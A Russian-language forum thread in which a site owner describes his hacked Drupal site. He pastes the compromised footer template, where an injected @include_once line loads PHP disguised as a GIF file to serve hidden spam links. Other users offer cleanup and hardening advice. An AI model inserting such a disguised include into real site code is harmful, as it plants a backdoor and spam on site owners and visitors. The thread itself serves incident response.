[X] Помощник

[jjoret Topic Starter]

Здравствуйте. Недавно взломали мой сайт на друпале, а я думал самая безопасная кмс, вставили код в футер, на некоторых страницах отображались ссылки с околоссылочным текстом в маленьком шрифте на том месте, очень похоже на биржу ссылок. Вот код:

Код

<?php
if(render($page['footer'])){
print '<div class="footer"><div class="wrapper">'.render($page['footer']); @include_once($_SERVER['DOCUMENT_ROOT'].'/modules/color/header.gif'); print '</div></div>';
}
if(render($page['hide'])){
print render($page['hide']);
}
?>

собственно вирус: @include_once($_SERVER['DOCUMENT_ROOT'].'/modules/color/header.gif'
Этот гиф-файл зашифрован под пхп-код. В общем я его удалил, но вопрос возник: одно дело залить файл на хостинг, другое - изменить код и вставить туда ссылку на вирус-файл. То есть должен быть еще где-то загрузчик, с помощью которого взломщик может закачивать все что хочет. К знатокам Друпала, кто что думает по этому поводу? и как это все удалить и не допустить впредь?

[DVORYAN]

Какая версия Drupal, у меня старые версии взламывали, после обновления ядра и всех модулей взломы прекратились.

[kagtus]

айболитом проверьте и движок/модули обновите.

P.S. самая безопасная - не значит что ее нельзя взломать

[Infacto]

Была такая же беда на ВП, удалил файл, сменил пароли(фтп, хостинг, админка), удалил код, просмотрел все файлы с датой изменения которые я не вносил. Больше такого не было.

[jjoret Topic Starter]

А кто-нибудь догодывается как взломщик смог поменять код в файле шаблона?

[Infacto]

jjoret,
Думаю через плагин, плагины тоже обновлял. А может и через хостинг (у меня от верблюда)

[Rampage]

ищите шелл изначально айболитом как посоветовали выше, если на одном акаунте есть еще сайты по соседству вполне могли получить доступ через них, ну и после чистки грамотно выставить права

[webpavilion]

Если ломанули именно drupal, а не соседний сайт или пароль к FTP и вам не мстит один из бывших создателей, то с вероятностью в 99.9% процента стоит какая нибудь древность которую нужно обновить было года полтора назад. В стоковых эксплоит паках максимум что ломаеться по ядру до 7.12 и 6.24 и то там с оговорками и удобным стечением обстоятельств.

А еще может собрали так криворуко что анонимам можно php прямо из формы комментариев исполнять или бекдор залили на всякий.

А так да, самая безопасная.

[jjoret Topic Starter]

Допустим я удалил вирус, но мне нужно быть уверенным, что в дальнейшем не случится подобного, ведь это я заметил чисто случайно. Может есть какая-то программа или сервис чтобы автоматически чекал ссылки со всех страниц сайта, типа как Xenu?

[Drupal_way]

Чтобы это не повторилось - обновляйте друпал и модуля. Проверка ссылок тут http://www.linkpad.ru/